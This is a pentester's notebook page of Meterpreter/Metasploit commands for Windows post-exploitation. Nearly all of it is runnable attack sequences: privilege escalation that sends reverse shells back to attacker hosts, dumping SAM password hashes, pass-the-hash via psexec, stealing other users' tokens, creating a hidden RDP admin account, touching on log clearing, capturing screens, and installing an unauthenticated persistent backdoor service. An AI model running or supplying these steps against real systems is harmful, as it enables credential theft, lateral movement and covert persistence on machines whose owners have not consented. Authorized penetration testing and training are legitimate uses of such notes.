refabr1k's Pentest Notebook
Windows Post Exploitation

#Meterpreter privesc
# Load the priv extension (recent Meterpreter loads it automatically) and try the
# built-in getsystem techniques; `getsystem -h` lists them. They only succeed from an
# already privileged context (local administrator, or a service account holding
# SeImpersonatePrivilege); from a plain user account expect "Access is denied".
meterpreter > use priv
meterpreter > getsystem -h
meterpreter > getsystem
meterpreter > getuid

# When getsystem fails, background the session and run a local exploit module against it
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d

# SESSION is the id shown by `sessions -l`; LHOST/LPORT are the attacker side for the new shell
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
#Server username: NT AUTHORITY\SYSTEM

# KiTrap0d (MS10-015) only works against 32-bit Windows up to Windows 7, from an x86 session.
# On anything newer run post/multi/recon/local_exploit_suggester to list local exploits that apply.

Hashdump and Pass The Hash

# hashdump needs a SYSTEM session; it prints the SAM in pwdump format, user:rid:LM:NT:::
meterpreter > run post/windows/gather/hashdump

# Pass the Hash: psexec authenticates over SMB (445) with the raw hashes, no cracking needed.
# SMBPass takes LM:NT; an LM half of aad3b435b51404eeaad3b435b51404ee just means LM storage
# is disabled. The pair below is the LM and NT hash of "password". SMBUser is required and
# the account must be a local administrator on the target (RHOSTS in current Metasploit).
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > show options
msf exploit(psexec) > exploit
meterpreter > shell

Stealing Tokens (Incognito)

# Incognito steals the access tokens of other logged-on users. Listing all tokens needs
# SYSTEM (or SeImpersonatePrivilege). Delegation tokens (from interactive logons) can be
# used to authenticate to other hosts; impersonation tokens are only good on this host.
meterpreter > use incognito
meterpreter > help
meterpreter > list_tokens -u
#Delegation Tokens Available
#========================================
#NT AUTHORITY\LOCAL SERVICE
#NT AUTHORITY\NETWORK SERVICE
#NT AUTHORITY\SYSTEM
#SNEAKS.IN\Administrator

# The backslash must be escaped (DOMAIN\\user); rev2self drops the stolen token afterwards
meterpreter > impersonate_token SNEAKS.IN\\Administrator
#[+] Delegation token available
#[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
#Server username: SNEAKS.IN\Administrator

Enable RDP and create User

# getgui enables RDP (3389), opens the firewall for it and creates a local user in the
# Remote Desktop Users and Administrators groups. It is a legacy Meterpreter script; the
# maintained equivalent is post/windows/manage/enable_rdp (USERNAME/PASSWORD options).
# It also writes a clean-up .rc under ~/.msf4/logs/scripts/getgui/ that reverts its changes.
meterpreter > run getgui -h
meterpreter > run getgui -u loneferret -p password

Clearing logs

# Replay the clean-up .rc that getgui wrote (removes the user, disables RDP and the firewall
# rule again); the file name carries the timestamp of the run. This does not touch the Windows
# event logs: those are emptied with the core command clearev, which is loud, since clearing
# the Security log itself writes event 1102 and defenders alert on it.
meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc

Screen Capture

# Migrate into explorer.exe (the logged-on user's desktop process) so the session is
# attached to the interactive desktop, then load espia for screengrab. The stdapi
# screenshot command does the same without loading an extension.
meterpreter > ps
#260   Explorer.EXE         C:\WINDOWS\Explorer.EXE
meterpreter > migrate 260
meterpreter > use espia
meterpreter > screengrab
#Screenshot saved to: /root/nYdRUppb.jpeg

Backdoor

# metsvc installs Meterpreter as a Windows service listening on TCP 31337 that hands a
# SYSTEM shell to anyone who connects, with no authentication. Never leave it behind on
# a client network; remove it with `run metsvc -r`. Migrate to a stable process first.
msf exploit(3proxy) > exploit
meterpreter > ps
meterpreter > migrate 632
meterpreter > run metsvc -h
meterpreter > run metsvc

# Reconnect later with the bind payload: RHOST is the target, LPORT is the metsvc port
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
#PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
#LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
#RHOST => 192.168.1.104
msf exploit(handler) > exploit

Last updated 4 years ago
